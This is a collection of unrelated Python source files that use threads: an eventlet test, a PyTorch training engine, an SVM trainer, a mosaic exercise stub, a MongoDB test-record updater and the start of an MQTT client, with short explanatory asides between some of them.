| source | python |
|---|---|
patcher_importlib_lock.py
|
from __future__ import print_function
import sys
import eventlet
# no standard tests in this file, ignore
__test__ = False
def do_import():
import encodings.idna
if __name__ == '__main__':
eventlet.monkey_patch()
threading = eventlet.patcher.original('threading')
sys.modules.pop('encodings.idna', None)
# call "import encodings.idna" in a new thread
thread = threading.Thread(target=do_import)
thread.start()
# call "import encodings.idna" in the main thread
do_import()
thread.join()
print('pass')
|
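A quick aside on the API this test relies on: after `eventlet.monkey_patch()`, importing `threading` yields eventlet's green-thread version, while `eventlet.patcher.original('threading')` returns the untouched stdlib module backed by OS threads, which is what lets the test exercise a real concurrent import. A minimal sketch, assuming eventlet is installed:
|
import eventlet
eventlet.monkey_patch()

import threading as patched_threading  # green-thread backed after monkey_patch()
original_threading = eventlet.patcher.original('threading')  # unpatched stdlib module

# The two module objects are distinct: one spawns greenlets, the other OS threads.
print(patched_threading is original_threading)  # False
|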
engine.py
|
import os
import math
import operator
import time
import torch
import datetime
import threading
import numpy as np
from ..lib import utils
from ..lib.options import Options
from ..lib.logger import Logger
class Engine(object):
"""Contains training and evaluation procedures
"""
def __init__(self):
self.hooks = {}
self.epoch = 0
self.dataset = None
self.model = None
self.optimizer = None
self.view = None
self.best_out = {}
# generate_view will be executed at the end of each
# training and evaluation epoch
self.register_hook('train_on_flush', self.generate_view)
self.register_hook('eval_on_flush', self.generate_view)
def generate_view(self):
""" Generate a view.html via an asynchronous call to `self.view.generate()`
"""
if self.view is not None:
if hasattr(self.view, 'current_thread') and self.view.current_thread.is_alive():
Logger()('Skipping view generation: another view is already being generated', log_level=Logger.WARNING)
Logger()('Consider removing batch entries from views.items in order to speed it up', log_level=Logger.WARNING)
else:
                # TODO: Redesign this threading system so it won't slow down training.
                # Python threads don't run in parallel because of the global interpreter lock;
                # we might need multiprocessing or some other approach.
self.view.current_thread = threading.Thread(target=self.view.generate)
self.view.current_thread.start()
# path_opts = os.path.join(Options()['exp']['dir'], 'options.yaml')
# os.system('python -m bootstrap.views.view --path_opts {}'.format(path_opts))
def load_state_dict(self, state):
self.epoch = state['epoch']
self.best_out = state['best_out']
def state_dict(self):
state = {}
state['epoch'] = self.epoch
state['best_out'] = self.best_out
return state
def hook(self, name):
""" Run all the callback functions that have been registered
for a hook.
Args:
name: the name of the hook
"""
if name in self.hooks:
for func in self.hooks[name]:
func()
def register_hook(self, name, func):
""" Register a callback function to be triggered when the hook
is called.
Args:
name: the name of the hook
func: the callback function (no argument)
Example usage:
.. code-block:: python
def func():
print('hooked!')
engine.register_hook('train_on_start_batch', func)
"""
if name not in self.hooks:
self.hooks[name] = []
self.hooks[name].append(func)
def resume(self, map_location=None):
""" Resume a checkpoint using the `bootstrap.lib.options.Options`
"""
Logger()('Loading {} checkpoint'.format(Options()['exp']['resume']))
self.load(Options()['exp']['dir'],
Options()['exp']['resume'],
self.model, self.optimizer,
map_location=map_location)
self.epoch += 1
def eval(self):
""" Launch evaluation procedures
"""
Logger()('Launching evaluation procedures')
if Options()['dataset']['eval_split']:
            # self.epoch-1 matches the epoch that was resumed,
            # or equals -1 when the run was not resumed
self.eval_epoch(self.model, self.dataset['eval'], self.epoch - 1, logs_json=True)
Logger()('Ending evaluation procedures')
def train(self):
""" Launch training procedures
List of the hooks:
- train_on_start: before the full training procedure
"""
Logger()('Launching training procedures')
self.hook('train_on_start')
while self.epoch < Options()['engine']['nb_epochs']:
self.train_epoch(self.model, self.dataset['train'], self.optimizer, self.epoch)
if Options()['dataset']['eval_split']:
out = self.eval_epoch(self.model, self.dataset['eval'], self.epoch)
if 'saving_criteria' in Options()['engine'] and Options()['engine']['saving_criteria'] is not None:
for saving_criteria in Options()['engine']['saving_criteria']:
if self.is_best(out, saving_criteria):
name = saving_criteria.split(':')[0]
Logger()('Saving best checkpoint for strategy {}'.format(name))
self.save(Options()['exp']['dir'], 'best_{}'.format(name), self.model, self.optimizer)
Logger()('Saving last checkpoint')
self.save(Options()['exp']['dir'], 'last', self.model, self.optimizer)
self.epoch += 1
Logger()('Ending training procedures')
def train_epoch(self, model, dataset, optimizer, epoch, mode='train'):
""" Launch training procedures for one epoch
List of the hooks:
- train_on_start_epoch: before the training procedure for an epoch
            - train_on_start_batch: before the training procedure for a batch
- train_on_forward: after the forward of the model
- train_on_backward: after the backward of the loss
- train_on_update: after the optimization step
- train_on_print: after the print to the terminal
- train_on_end_batch: end of the training procedure for a batch
- train_on_end_epoch: before saving the logs in logs.json
- train_on_flush: end of the training procedure for an epoch
"""
utils.set_random_seed(Options()['misc']['seed'] + epoch) # to be able to reproduce exps on reload
Logger()('Training model on {}set for epoch {}'.format(dataset.split, epoch))
model.train()
timer = {
'begin': time.time(),
'elapsed': time.time(),
'process': None,
'load': None,
'run_avg': 0
}
out_epoch = {}
batch_loader = dataset.make_batch_loader()
self.hook(f'{mode}_on_start_epoch')
for i, batch in enumerate(batch_loader):
timer['load'] = time.time() - timer['elapsed']
self.hook(f'{mode}_on_start_batch')
optimizer.zero_grad()
out = model(batch)
self.hook(f'{mode}_on_forward')
if not torch.isnan(out['loss']):
out['loss'].backward()
else:
Logger()('NaN detected')
# torch.cuda.synchronize()
self.hook(f'{mode}_on_backward')
optimizer.step()
# torch.cuda.synchronize()
self.hook(f'{mode}_on_update')
timer['process'] = time.time() - timer['elapsed']
if i == 0:
timer['run_avg'] = timer['process']
else:
timer['run_avg'] = timer['run_avg'] * 0.8 + timer['process'] * 0.2
Logger().log_value(f'{mode}_batch.epoch', epoch, should_print=False)
Logger().log_value(f'{mode}_batch.batch', i, should_print=False)
Logger().log_value(f'{mode}_batch.timer.process', timer['process'], should_print=False)
Logger().log_value(f'{mode}_batch.timer.load', timer['load'], should_print=False)
for key, value in out.items():
if torch.is_tensor(value):
if value.numel() <= 1:
value = value.item() # get number from a torch scalar
else:
continue
if isinstance(value, (list, dict, tuple)):
continue
if key not in out_epoch:
out_epoch[key] = []
out_epoch[key].append(value)
Logger().log_value(f'{mode}_batch.' + key, value, should_print=False)
if i % Options()['engine']['print_freq'] == 0 or i == len(batch_loader) - 1:
Logger()("{}: epoch {} | batch {}/{}".format(mode, epoch, i, len(batch_loader) - 1))
Logger()("{} elapsed: {} | left: {}".format(
' ' * len(mode),
datetime.timedelta(seconds=math.floor(time.time() - timer['begin'])),
datetime.timedelta(seconds=math.floor(timer['run_avg'] * (len(batch_loader) - 1 - i)))))
Logger()("{} process: {:.5f} | load: {:.5f}".format(' ' * len(mode), timer['process'], timer['load']))
Logger()("{} loss: {:.5f}".format(' ' * len(mode), out['loss'].data.item()))
self.hook(f'{mode}_on_print')
timer['elapsed'] = time.time()
self.hook(f'{mode}_on_end_batch')
Logger().log_value(f'{mode}_epoch.epoch', epoch, should_print=True)
for key, value in out_epoch.items():
Logger().log_value(f'{mode}_epoch.' + key, np.asarray(value).mean(), should_print=True)
self.hook(f'{mode}_on_end_epoch')
Logger().flush()
self.hook(f'{mode}_on_flush')
def eval_epoch(self, model, dataset, epoch, mode='eval', logs_json=True):
""" Launch evaluation procedures for one epoch
List of the hooks (``mode='eval'`` by default):
- mode_on_start_epoch: before the evaluation procedure for an epoch
            - mode_on_start_batch: before the evaluation procedure for a batch
- mode_on_forward: after the forward of the model
- mode_on_print: after the print to the terminal
- mode_on_end_batch: end of the evaluation procedure for a batch
- mode_on_end_epoch: before saving the logs in logs.json
- mode_on_flush: end of the evaluation procedure for an epoch
Returns:
out(dict): mean of all the scalar outputs of the model, indexed by output name, for this epoch
"""
utils.set_random_seed(Options()['misc']['seed'] + epoch) # to be able to reproduce exps on reload
Logger()('Evaluating model on {}set for epoch {}'.format(dataset.split, epoch))
model.eval()
timer = {
'begin': time.time(),
'elapsed': time.time(),
'process': None,
'load': None,
'run_avg': 0
}
out_epoch = {}
batch_loader = dataset.make_batch_loader()
self.hook('{}_on_start_epoch'.format(mode))
for i, batch in enumerate(batch_loader):
timer['load'] = time.time() - timer['elapsed']
self.hook('{}_on_start_batch'.format(mode))
with torch.no_grad():
out = model(batch)
# torch.cuda.synchronize()
self.hook('{}_on_forward'.format(mode))
timer['process'] = time.time() - timer['elapsed']
if i == 0:
timer['run_avg'] = timer['process']
else:
timer['run_avg'] = timer['run_avg'] * 0.8 + timer['process'] * 0.2
Logger().log_value('{}_batch.batch'.format(mode), i, should_print=False)
Logger().log_value('{}_batch.epoch'.format(mode), epoch, should_print=False)
Logger().log_value('{}_batch.timer.process'.format(mode), timer['process'], should_print=False)
Logger().log_value('{}_batch.timer.load'.format(mode), timer['load'], should_print=False)
for key, value in out.items():
if torch.is_tensor(value):
                if value.numel() <= 1:
value = value.item() # get number from a torch scalar
else:
continue
if isinstance(value, (list, dict, tuple)):
continue
if key not in out_epoch:
out_epoch[key] = []
out_epoch[key].append(value)
Logger().log_value('{}_batch.{}'.format(mode, key), value, should_print=False)
if i % Options()['engine']['print_freq'] == 0:
Logger()("{}: epoch {} | batch {}/{}".format(mode, epoch, i, len(batch_loader) - 1))
Logger()("{} elapsed: {} | left: {}".format(
' ' * len(mode),
datetime.timedelta(seconds=math.floor(time.time() - timer['begin'])),
datetime.timedelta(seconds=math.floor(timer['run_avg'] * (len(batch_loader) - 1 - i)))))
Logger()("{} process: {:.5f} | load: {:.5f}".format(' ' * len(mode), timer['process'], timer['load']))
self.hook('{}_on_print'.format(mode))
timer['elapsed'] = time.time()
self.hook('{}_on_end_batch'.format(mode))
out = {}
for key, value in out_epoch.items():
out[key] = sum(value) / len(value)
Logger().log_value('{}_epoch.epoch'.format(mode), epoch, should_print=True)
for key, value in out.items():
Logger().log_value('{}_epoch.{}'.format(mode, key), value, should_print=True)
self.hook('{}_on_end_epoch'.format(mode))
if logs_json:
Logger().flush()
self.hook('{}_on_flush'.format(mode))
return out
def is_best(self, out, saving_criteria):
""" Verify if the last model is the best for a specific saving criteria
Args:
out(dict): mean of all the scalar outputs of model indexed by output name
saving_criteria(str):
Returns:
is_best(bool)
Example usage:
.. code-block:: python
out = {
'loss': 0.2,
'acctop1': 87.02
}
engine.is_best(out, 'loss:min')
"""
        if ':min' in saving_criteria:
            name = saving_criteria.replace(':min', '')
            is_better = operator.lt
        elif ':max' in saving_criteria:
            name = saving_criteria.replace(':max', '')
            is_better = operator.gt
        else:
            error_msg = ("'--engine.saving_criteria' named '{}' does not specify an order: "
                         "choose between '{}' and '{}' to indicate whether the criteria must be "
                         "minimized or maximized").format(
                             saving_criteria, saving_criteria + ':min', saving_criteria + ':max')
            raise ValueError(error_msg)
if name not in out:
raise KeyError("'--engine.saving_criteria' named '{}' not in outputs '{}'".format(name, list(out.keys())))
if name not in self.best_out:
self.best_out[name] = out[name]
return True
else:
            if is_better(out[name], self.best_out[name]):
self.best_out[name] = out[name]
return True
return False
def load(self, dir_logs, name, model, optimizer, map_location=None):
""" Load a checkpoint
Args:
dir_logs: directory of the checkpoint
name: name of the checkpoint
model: model associated to the checkpoint
optimizer: optimizer associated to the checkpoint
"""
path_template = os.path.join(dir_logs, 'ckpt_{}_{}.pth.tar')
Logger()('Loading model...')
model_state = torch.load(path_template.format(name, 'model'), map_location=map_location)
model.load_state_dict(model_state)
if Options()['dataset']['train_split'] is not None:
if os.path.isfile(path_template.format(name, 'optimizer')):
Logger()('Loading optimizer...')
optimizer_state = torch.load(path_template.format(name, 'optimizer'), map_location=map_location)
optimizer.load_state_dict(optimizer_state)
else:
Logger()('No optimizer checkpoint', log_level=Logger.WARNING)
if os.path.isfile(path_template.format(name, 'engine')):
Logger()('Loading engine...')
engine_state = torch.load(path_template.format(name, 'engine'), map_location=map_location)
self.load_state_dict(engine_state)
else:
Logger()('No engine checkpoint', log_level=Logger.WARNING)
def save(self, dir_logs, name, model, optimizer):
""" Save a checkpoint
Args:
dir_logs: directory of the checkpoint
name: name of the checkpoint
model: model associated to the checkpoint
optimizer: optimizer associated to the checkpoint
"""
path_template = os.path.join(dir_logs, 'ckpt_{}_{}.pth.tar')
Logger()('Saving model...')
model_state = model.state_dict()
torch.save(model_state, path_template.format(name, 'model'))
Logger()('Saving optimizer...')
optimizer_state = optimizer.state_dict()
torch.save(optimizer_state, path_template.format(name, 'optimizer'))
Logger()('Saving engine...')
engine_state = self.state_dict()
torch.save(engine_state, path_template.format(name, 'engine'))
|
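A hypothetical usage sketch of the hook and saving-criteria machinery in `Engine` above; the callback and the output values are illustrative placeholders, not part of the library:
|
engine = Engine()

# Register a callback that fires before every training batch.
def on_start_batch():
    print('starting a new batch')

engine.register_hook('train_on_start_batch', on_start_batch)
engine.hook('train_on_start_batch')  # runs on_start_batch()

# is_best() compares a named output against the best value recorded so far;
# the ':min'/':max' suffix selects the comparison direction.
out = {'loss': 0.31, 'acctop1': 88.4}
assert engine.is_best(out, 'loss:min')                 # first call records the best
assert not engine.is_best({'loss': 0.35}, 'loss:min')  # 0.35 is not < 0.31
|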
svm_trainer.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import pickle
import threading
import numpy as np
from iopath.common.file_io import g_pathmgr
from sklearn.model_selection import cross_val_score
from sklearn.svm import LinearSVC
from vissl.utils.io import load_file, save_file
from vissl.utils.svm_utils.evaluate import get_precision_recall
# Turning this into a class encapsulates the training and evaluation logic
# together, unlike the OSS benchmark, which uses 3 separate scripts.
class SVMTrainer(object):
"""
SVM trainer that takes care of training (using k-fold cross validation),
and evaluating the SVMs
"""
def __init__(self, config, layer, output_dir):
self.config = config
self.normalize = config["normalize"]
self.layer = layer
self.output_dir = self._get_output_dir(output_dir)
self.costs_list = self._get_costs_list()
self.train_ap_matrix = None
self.cls_list = []
def _get_output_dir(self, cfg_out_dir):
odir = f"{cfg_out_dir}/{self.layer}"
g_pathmgr.mkdirs(odir)
logging.info(f"Output directory for SVM results: {odir}")
return odir
def load_input_data(self, data_file, targets_file):
"""
Given the input data (features) and targets (labels) files, load the
features of shape N x D and labels of shape (N,)
"""
assert g_pathmgr.exists(data_file), "Data file not found. Abort!"
assert g_pathmgr.exists(targets_file), "Targets file not found. Abort!"
# load the features and the targets
logging.info("loading features and targets...")
targets = load_file(targets_file)
features = np.array(load_file(data_file)).astype(np.float64)
assert features.shape[0] == targets.shape[0], "Mismatched #images"
logging.info(f"Loaded features: {features.shape} and targets: {targets.shape}")
return features, targets
def _normalize_features(self, features):
"""
Normalize the features.
"""
feats_norm = np.linalg.norm(features, axis=1)
features = features / (feats_norm + 1e-5)[:, np.newaxis]
return features
def _get_costs_list(self):
"""
        Cost values for which SVM training is done. We take the cost values
        specified in the costs_list input in the config file. Additionally,
        costs specified as powers of a base value are also added
(assuming the base value is > 0).
"""
costs_list = self.config["costs"]["costs_list"]
# we append more costs to the output based on power function
if self.config["costs"]["base"] > 0.0:
base = self.config["costs"]["base"]
start_num, end_num = self.config["costs"]["power_range"]
for num in range(start_num, end_num):
costs_list.append(base**num)
self.costs_list = costs_list
logging.info("Training SVM for costs: {}".format(costs_list))
return costs_list
def _get_cls_list(self, targets):
num_classes = targets.shape[1]
cls_list = range(num_classes)
if len(self.config["cls_list"]) > 0:
cls_list = [int(cls_num) for cls_num in self.config["cls_list"]]
self.cls_list = cls_list
logging.info("Training SVM for classes: {}".format(self.cls_list))
return cls_list
def _get_svm_model_filename(self, cls_num, cost):
cls_cost = str(cls_num) + "_cost" + str(float(cost))
out_file = f"{self.output_dir}/cls{cls_cost}.pickle"
ap_matrix_out_file = f"{self.output_dir}/AP_cls{cls_cost}.npy"
return out_file, ap_matrix_out_file
def get_best_cost_value(self):
"""
        During the SVM training, we write the cross-validation
AP value for training at each class and cost value
combination. We load the AP values and for each
class, determine the cost value that gives the maximum
AP. We return the chosen cost values for each class as a
numpy matrix.
"""
crossval_ap_file = f"{self.output_dir}/crossval_ap.npy"
chosen_cost_file = f"{self.output_dir}/chosen_cost.npy"
if g_pathmgr.exists(crossval_ap_file) and g_pathmgr.exists(chosen_cost_file):
self.chosen_cost = load_file(chosen_cost_file)
self.train_ap_matrix = load_file(crossval_ap_file)
return self.chosen_cost
if self.train_ap_matrix is None:
num_classes = len(self.cls_list)
self.train_ap_matrix = np.zeros((num_classes, len(self.costs_list)))
for cls_num in range(num_classes):
for cost_idx in range(len(self.costs_list)):
cost = self.costs_list[cost_idx]
_, ap_out_file = self._get_svm_model_filename(cls_num, cost)
self.train_ap_matrix[cls_num][cost_idx] = float(
load_file(ap_out_file)[0]
)
argmax_cls = np.argmax(self.train_ap_matrix, axis=1)
chosen_cost = [self.costs_list[idx] for idx in argmax_cls]
logging.info(f"chosen_cost: {chosen_cost}")
save_file(np.array(self.train_ap_matrix), crossval_ap_file)
save_file(np.array(chosen_cost), chosen_cost_file)
logging.info(f"saved crossval_ap AP to file: {crossval_ap_file}")
logging.info(f"saved chosen costs to file: {chosen_cost_file}")
self.chosen_cost = chosen_cost
return np.array(chosen_cost)
def train_cls(self, features, targets, cls_num):
"""
Train SVM on the input features and targets for a given class.
        The SVMs are trained for all cost values for the given class. We
also save the cross-validation AP at each cost value for the given
class.
"""
logging.info(f"Training cls: {cls_num}")
for cost_idx in range(len(self.costs_list)):
cost = self.costs_list[cost_idx]
out_file, ap_out_file = self._get_svm_model_filename(cls_num, cost)
if (
g_pathmgr.exists(out_file)
and g_pathmgr.exists(ap_out_file)
and not self.config.force_retrain
):
logging.info(f"SVM model exists: {out_file}")
logging.info(f"AP file exists: {ap_out_file}")
continue
logging.info(f"Training model with the cost: {cost} cls: {cls_num}")
clf = LinearSVC(
C=cost,
class_weight={1: 2, -1: 1},
intercept_scaling=1.0,
verbose=1,
penalty=self.config["penalty"],
loss=self.config["loss"],
tol=0.0001,
dual=self.config["dual"],
max_iter=self.config["max_iter"],
)
cls_labels = targets[:, cls_num].astype(dtype=np.int32, copy=True)
# meaning of labels in VOC/COCO original loaded target files:
# label 0 = not present, set it to -1 as svm train target
# label 1 = present. Make the svm train target labels as -1, 1.
cls_labels[np.where(cls_labels == 0)] = -1
num_positives = len(np.where(cls_labels == 1)[0])
num_negatives = len(cls_labels) - num_positives
logging.info(
f"cls: {cls_num} has +ve: {num_positives} -ve: {num_negatives} "
f"ratio: {float(num_positives) / num_negatives} "
f"features: {features.shape} cls_labels: {cls_labels.shape}"
)
ap_scores = cross_val_score(
clf,
features,
cls_labels,
cv=self.config["cross_val_folds"],
scoring="average_precision",
)
self.train_ap_matrix[cls_num][cost_idx] = ap_scores.mean()
clf.fit(features, cls_labels)
logging.info(
f"cls: {cls_num} cost: {cost} AP: {ap_scores} "
f"mean:{ap_scores.mean()}"
)
logging.info(f"Saving cls cost AP to: {ap_out_file}")
save_file(np.array([ap_scores.mean()]), ap_out_file)
logging.info(f"Saving SVM model to: {out_file}")
with g_pathmgr.open(out_file, "wb") as fwrite:
pickle.dump(clf, fwrite)
def train(self, features, targets):
"""
        Train SVMs on the given features and targets for all classes and all
        the cost values.
"""
logging.info("Training SVM")
if self.normalize:
# normalize the features: N x 9216 (example shape)
features = self._normalize_features(features)
# get the class lists to train: whether all or some
self.cls_list = self._get_cls_list(targets)
self.train_ap_matrix = np.zeros((len(self.cls_list), len(self.costs_list)))
threads = []
for cls_idx in range(len(self.cls_list)):
cls_num = self.cls_list[cls_idx]
threads.append(
threading.Thread(
target=self.train_cls, args=(features, targets, cls_num)
)
)
for t in threads:
t.start()
for t in threads:
t.join()
def test(self, features, targets):
"""
Test the trained SVM models on the test features and targets values.
        We use the per-class cost that gives the maximum cross-validation AP on
        the training set and load the corresponding trained SVM model for that
        cost value and class.
Log the test ap to stdout and also save the AP in a file.
"""
logging.info("Testing SVM")
        if self.normalize:
            # normalize the features: N x 9216 (example shape)
features = self._normalize_features(features)
num_classes = targets.shape[1]
logging.info("Num test classes: {}".format(num_classes))
# get the chosen cost that maximizes the cross-validation AP per class
costs_list = self.get_best_cost_value()
ap_matrix = np.zeros((num_classes, 1))
for cls_num in range(num_classes):
cost = costs_list[cls_num]
logging.info(f"Testing model for cls: {cls_num} cost: {cost}")
model_file, _ = self._get_svm_model_filename(cls_num, cost)
model = load_file(model_file)
prediction = model.decision_function(features)
cls_labels = targets[:, cls_num]
# meaning of labels in VOC/COCO original loaded target files:
# label 0 = not present, set it to -1 as svm train target
# label 1 = present. Make the svm train target labels as -1, 1.
evaluate_data_inds = targets[:, cls_num] != -1
eval_preds = prediction[evaluate_data_inds]
eval_cls_labels = cls_labels[evaluate_data_inds]
eval_cls_labels[np.where(eval_cls_labels == 0)] = -1
P, R, score, ap = get_precision_recall(eval_cls_labels, eval_preds)
ap_matrix[cls_num][0] = ap
logging.info(f"Mean test AP: {np.mean(ap_matrix, axis=0)}")
test_ap_filepath = f"{self.output_dir}/test_ap.npy"
save_file(np.array(ap_matrix), test_ap_filepath)
logging.info(f"saved test AP to file: {test_ap_filepath}")
|
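A hedged end-to-end sketch of driving `SVMTrainer` above. The class mixes key access (`config["normalize"]`) with attribute access (`config.force_retrain`), so a plain dict needs a small attribute-style wrapper (VISSL itself passes its own config objects); the paths, layer name, and shapes below are placeholders:
|
import numpy as np

class AttrDict(dict):
    # minimal dict with attribute access, matching both access styles the trainer uses
    __getattr__ = dict.__getitem__

config = AttrDict(
    normalize=True,
    costs={"costs_list": [0.01, 0.1], "base": -1.0, "power_range": [0, 0]},
    cls_list=[],
    penalty="l2",
    loss="squared_hinge",
    dual=True,
    max_iter=2000,
    cross_val_folds=3,
    force_retrain=False,
)

trainer = SVMTrainer(config, layer="res5", output_dir="/tmp/svm")
features = np.random.randn(100, 16)           # N x D features (placeholder)
targets = np.random.randint(0, 2, (100, 3))   # N x num_classes 0/1 labels (placeholder)
trainer.train(features, targets)
trainer.test(features, targets)
|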
mosaic_image.py
|
import numpy as np
import cv2
from imutils import resize
import threading
from mosaic_maker.image_processor import ImageProcessor
from mosaic_maker.patch import Patch
class MosaicImage:
    def __init__(self, image, patch_size, patch_picker):
        self.original_image = image
        self.patch_size = patch_size
        self.patch_picker = patch_picker
self.target_image = self._crop_image_to_patch_size(image.copy(), patch_size)
self.target_sobel_image = ImageProcessor.calculate_sobel_magnitude_image(self.target_image)
self.processing_image = False
@staticmethod
def _crop_image_to_patch_size(image, patch_size):
# ToDo crop image so it is divisible by patch_size
# https://docs.scipy.org/doc/numpy-dev/user/quickstart.html
return image
def compose_mosaic(self):
print('BUILDING MOSAIC')
target_image = self.target_image
target_sobel_image = self.target_sobel_image
mosaic = np.zeros(target_image.shape, np.uint8)
sobel_mosaic = np.zeros(target_sobel_image.shape, np.uint8)
(height, width) = target_image.shape[:2]
target_image_copy = target_image.copy()
target_sobel_image_copy = target_sobel_image.copy()
self.processing_image = True
        threading.Thread(
            target=self._compose_mosaic_for,
            args=(width, height, mosaic, sobel_mosaic,
                  target_image_copy, target_sobel_image_copy),
        ).start()
self._progress_display_loop(mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy)
return mosaic
def _compose_mosaic_for(self, width, height, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy):
for y in range(0, height, self.patch_size):
for x in range(0, width, self.patch_size):
self._select_patch_for(x, y, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy)
self.processing_image = False
def _select_patch_for(self, x, y, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy):
# ToDo create patch for current position
# ToDo select patch from patch picker
# ToDo update mosaic and draw current window on images copies
# https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html#rectangle
return
def _progress_display_loop(self, mosaic, sobel_mosaic, target_image_copy, target_sobel_image_copy):
while self.processing_image:
cv2.imshow('current target window', resize(target_image_copy, width=400))
cv2.imshow('current sobel target window', resize(target_sobel_image_copy, width=400))
cv2.imshow('mosaic', resize(mosaic, width=400))
cv2.imshow('sobel mosaic', resize(sobel_mosaic, width=400))
cv2.waitKey(10)
|
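The `ToDo` stubs above are clearly exercise scaffolding and are left in place; as one data point, a minimal sketch of the cropping step, assuming the usual NumPy layout of (height, width, channels):
|
def crop_image_to_patch_size(image, patch_size):
    # Trim the bottom and right edges so both dimensions are divisible by patch_size.
    height, width = image.shape[:2]
    return image[:height - height % patch_size, :width - width % patch_size]
|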
update_submission_record_tool.py
|
#!/usr/bin/python
import threading
import pymongo
import numpy as np
import pdb
import time
from bson.objectid import ObjectId
MONGO_DB = 'copo_mongo'
MONGO_HOST = '127.0.0.1'
MONGO_PORT = 27017
collection_name = 'test_submisson_progress_collection'
collection = pymongo.MongoClient(MONGO_HOST, MONGO_PORT)[MONGO_DB][collection_name]
mu = 40
sigma = 4
the_ids = list()
the_ids.append(ObjectId("5739f36a68236b8ca9e54011"))
the_ids.append(ObjectId("573c96df68236bd7a2ba132b"))
the_ids.append(ObjectId("573dd99568236b09876bb411"))
the_ids.append(ObjectId("573ef76968236b2e3909779b"))
the_ids.append(ObjectId("5745851468236ba373c72914"))
loops = 50000
def update_submission_record():
print('starting thread')
x = 0
for idx, i in enumerate(the_ids):
collection.remove({'sub_id': i})
collection.insert(
{
'sub_id': i,
'complete': idx * 25,
'speeds': []
}
)
while x < loops:
for idx, i in enumerate(the_ids):
collection.update(
{'sub_id': i},
{
                    '$push': {'speeds': np.cos(x) * idx + 1},  # sinusoid per record; amplitude scales with the record index
'$set': {'complete': float(x * idx + 1)/2 % 100}
}
)
time.sleep(1.0/2.0)
print('loop: ' + str(x))
x = x + 1
update_submission_record()
#t = threading.Thread(target=update_submission_record)
#t.daemon = True
#t.start()
#print('threads submitted')
|
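Note that `remove`, `insert`, and `update` above belong to the legacy pymongo API, which was removed in pymongo 4. A sketch of the same operations with the current method names (same filters and documents, assuming pymongo 3+):
|
# pymongo 3+/4 equivalents of the legacy calls used in the loop above
collection.delete_many({'sub_id': i})
collection.insert_one({'sub_id': i, 'complete': idx * 25, 'speeds': []})
collection.update_one(
    {'sub_id': i},
    {
        '$push': {'speeds': np.cos(x) * idx + 1},
        '$set': {'complete': float(x * idx + 1) / 2 % 100},
    },
)
|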
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import errno
import platform
import random
import select
import socket
HAVE_SSL = True
try:
import ssl
cert_reqs = ssl.CERT_REQUIRED
tls_version = ssl.PROTOCOL_TLSv1
except ImportError:
HAVE_SSL = False
cert_reqs = None
tls_version = None
import struct
import sys
import threading
import time
HAVE_DNS = True
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
# AWS WSS implementation
import core.protocol.paho.securedWebsocket.securedWebsocketCore as wssCore
import core.util.progressiveBackoffCore as backoffCore
import core.util.offlinePublishQueue as offlinePublishQueue
VERSION_MAJOR=1
VERSION_MINOR=0
VERSION_REVISION=0
VERSION_NUMBER=(VERSION_MAJOR*1000000+VERSION_MINOR*1000+VERSION_REVISION)
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] < 3:
PROTOCOL_NAMEv31 = "MQIsdp"
PROTOCOL_NAMEv311 = "MQTT"
else:
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish = 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
# MessageQueueing DropBehavior
MSG_QUEUEING_DROP_OLDEST = 0
MSG_QUEUEING_DROP_NEWEST = 1
if sys.version_info[0] < 3:
